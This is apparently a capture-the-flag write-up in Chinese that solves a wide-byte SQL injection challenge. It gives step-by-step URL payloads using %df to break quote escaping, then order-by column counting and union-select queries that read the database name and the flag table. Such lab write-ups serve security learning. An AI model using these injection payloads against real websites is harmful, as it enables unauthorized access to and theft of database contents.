http://103.238.227.13:10083/?id=1
我们看一下html源码
看到编码变化了
所以是宽字节注入
所以我们要用%df来代替一个字节
http://103.238.227.13:10083/?id=1%df
页面正确
加个单引号页面报错
http://103.238.227.13:10083/?id=1%df’
页面报错
存在注入
http://103.238.227.13:10083/?id=1%df' order by 2--+
判断最大字段为2
开始使用联合查询
http://103.238.227.13:10083/?id=1%df' union select 1,2--+
http://103.238.227.13:10083/?id=1%df' union select 1,database()--+
得到数据库了 我们来查一下flag
http://103.238.227.13:10083/?id=1%df' union select 1,string from sql5.key where id =1--+